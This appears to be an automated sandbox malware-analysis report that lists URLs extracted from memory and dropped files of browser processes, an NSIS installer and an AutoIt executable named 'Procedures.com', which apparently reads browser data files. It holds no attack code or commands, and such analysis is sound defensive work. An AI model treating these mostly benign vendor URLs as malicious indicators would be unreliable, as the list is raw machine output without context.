                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2686116570.000074D00259C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2826527405.000028280267C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: trZG6pItZj.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: chrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: Procedures.com, 0000000B.00000000.2113380186.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp, Night.0.dr, Procedures.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, P8Q1VA.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: msedge.exe, 00000013.00000002.2690100613.0000019CC1BB1000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2851481862.000001CDC66FA000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2821385203.000001CDC66FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://assets.msn.cn/resolver/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://assets.msn.com/resolver/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://bard.google.com/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://bit.ly/wb-precache
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://browser.events.data.msn.cn/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://browser.events.data.msn.com/
                Source: Reporting and NEL.26.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://c.msn.com/
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, P8Q1VA.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: offscreendocument_main.js.24.dr, service_worker_bin_prod.js.24.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 0000000F.00000003.2550296822.0000327000E88000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2693271301.000074D00238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: manifest.json.24.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: chrome.exe, 0000000F.00000003.2542404894.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549534905.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2544422708.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2542475225.0000327000C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2564944836.0000327000C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2546538152.0000327000E88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550296822.0000327000E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn((
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: msedge.exe, 00000013.00000002.2693271301.000074D00238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.24.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 0000000F.00000003.2530531866.00005788002E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2530508400.00005788002DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 0000000F.00000003.2549471455.0000327000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2542523577.0000327000BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2538044559.00003270004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2692591204.000074D002240000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2855446365.0000282802234000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.24.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Reporting and NEL.26.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: 2cc80dabc69f58b6_0.24.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.26.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: manifest.json0.24.drString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 0000000F.00000003.2579210853.0000327000F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
